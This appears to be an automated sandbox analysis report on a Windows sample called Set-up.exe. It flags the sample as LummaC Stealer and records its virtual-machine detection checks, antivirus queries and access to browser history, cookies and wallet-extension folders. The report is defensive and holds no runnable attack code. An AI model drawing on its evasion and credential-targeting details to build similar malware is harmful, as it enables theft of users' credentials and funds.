Source: Set-up.exe	String found in binary or memory: Installing service'. AbortingInvalid destination path specified. The destination file must be named ':\The CSI Agent must be installed on a local, fixed drive. AbortingCopying executable file to 'Error copying executable file :Service already installed. Uninstalling...Service uninstalled, continuing with install.. Continuing with install anyway.Error uninstalling service. SeServiceLogonRightError when granting user the SeServiceLogonRight privilege (OpenSCManager error .\"CreateService error =>Error creating service :Error settings service to DELAYED START:Continuing anywayAborting installation' service startRequesting 'StartService() error ' service started' successfully installed' failed to start' did not startRunning serviceService doneError starting service, Enabling loggingLogging enabledDisabling loggingLogging disabled' serviceStopping 'StartServiceCtrlDispatcher failed. Service not started.) was : The message returned by the system (An fatal error occurred while reverting user account state.) was: An error occurred while unloading user account profile.An error occurred while unloading user account state.SeBackupPrivilegeSeRestorePrivilegeHKEY_CLASSES_ROOTHKEY_CURRENT_USERHKEY_LOCAL_MACHINEHKEY_USERSHKEY_PERFORMANCE_DATAHKEY_DYN_DATAHKEY_CURRENT_CONFIGHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXTHKEY_UNKNOWNSoftware\Microsoft\Windows NT\CurrentVersionProductNameCSDVersionCurrentBuildNumberBuildLabCurrentTypeCurrentVersionSoftwareTypeSubVersionNumberSourcePath <file> <dest> <user[:pass]> Display this message and exit Display program version information and exit Write diagnostic information to the specified file. Display or log additional diagnostic information.--- Program Options: ---Starting serviceService successfully startedStopping serviceWaiting for service to stopService successfully stoppedRemoving serviceService successfully removedtruefalseios_base::badbit setios_base::failbit setios_base::eofbit set': Enter password for 'Unable to set console mode for password prompt.Unable to get console mode for password prompt.Unable to read password from console, error ldluLdLu%peEpPwchar'. Error code -> 'Unable to read registry valueUnable to save registry value (c)Unable to delete registry valuemap/set<T> too longinvalid map/set<T> iterator

Source: C:\Users\user\Desktop\Set-up.exe

File read: C:\Users\user\Desktop\Set-up.exe

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Set-up.exe

Static file information: File size 1104384 > 1048576

Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Set-up.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Set-up.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\deploy\release\psi3\psi_32\cmake\apps\sua\RelWithDebInfo\sua.pdb source: Set-up.exe

Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Set-up.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_007528C9 EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_007528C9

Source: Set-up.exe

Static PE information: real checksum: 0x121da6 should be: 0x119778

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CDF9F3 push FFFFFF99h; ret	0_3_02CDF9F5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007428F6 push ecx; ret	0_2_00742909
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00747435 push ecx; ret	0_2_00747448

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00738740 StartServiceW,GetLastError,__CxxThrowException@8,

0_2_00738740

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0074591D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0074591D

Source: C:\Users\user\Desktop\Set-up.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Set-up.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_0-38106

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 3.9 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 6200

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007415C5 _wcspbrk,__getdrive,FindFirstFileExW,_wcspbrk,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,_free,___loctotime64_t,_free,__sopen_s,__fstat64,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,		0_2_007415C5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007177A0 _memset,FindFirstFileW,GetLastError,_memcpy_s,FindNextFileW,InterlockedIncrement,InterlockedIncrement,_memcpy_s,__time64,WaitForSingleObject,InterlockedDecrement,		0_2_007177A0

Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B92000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.1527792149.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1422733773.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549782091.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577182327.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577339370.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.1527792149.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1422733773.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549782091.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577339370.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW$
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Set-up.exe, 00000000.00000003.1446745823.0000000003B8D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\Set-up.exe

API call chain: ExitProcess graph end node

graph_0-38173

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_3_02CF90B0 LdrInitializeThunk,

0_3_02CF90B0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00746323 _memset,IsDebuggerPresent,

0_2_00746323

Source: C:\Users\user\Desktop\Set-up.exe

0_2_007528C9

Source: C:\Users\user\Desktop\Set-up.exe

0_2_007528C9

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD0B9F mov eax, dword ptr fs:[00000030h]	0_2_00CD0B9F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD05DF mov edx, dword ptr fs:[00000030h]	0_2_00CD05DF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD11EF mov eax, dword ptr fs:[00000030h]	0_2_00CD11EF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD11EE mov eax, dword ptr fs:[00000030h]	0_2_00CD11EE
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD1BDD mov eax, dword ptr fs:[00000030h]	0_2_00CD1BDD
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00CD0F4F mov eax, dword ptr fs:[00000030h]	0_2_00CD0F4F

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0072C860 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetLastError,GetLastError,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetTokenInformation,GetLastError,ConvertSidToStringSidW,GetLastError,

0_2_0072C860

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00745B7F SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00745B7F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00745B5C SetUnhandledExceptionFilter,		0_2_00745B5C

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_007359A0 LogonUserW,GetLastError,GetLastError,GetLastError,LoadUserProfileW,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_007359A0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00747222 cpuid

0_2_00747222

Source: C:\Users\user\Desktop\Set-up.exe	Code function: EnumSystemLocalesW,	0_2_00746001
Source: C:\Users\user\Desktop\Set-up.exe	Code function: GetLocaleInfoW,	0_2_00746087
Source: C:\Users\user\Desktop\Set-up.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_0074884F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00752C27
Source: C:\Users\user\Desktop\Set-up.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00752D5B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00742E35
Source: C:\Users\user\Desktop\Set-up.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00753164
Source: C:\Users\user\Desktop\Set-up.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00753768

Source: C:\Users\user\Desktop\Set-up.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_007405C0 GetSystemTimeAsFileTime,__aulldiv,

0_2_007405C0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00726200 LookupAccountNameW,__CxxThrowException@8,__CxxThrowException@8,

0_2_00726200

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00749CD4 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00749CD4

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0071CAB0 _memset,GetVersionExW,

0_2_0071CAB0

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1527792149.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549566194.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577339370.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549851209.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1531434618.0000000000FCC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Set-up.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1578163081.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 1564, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
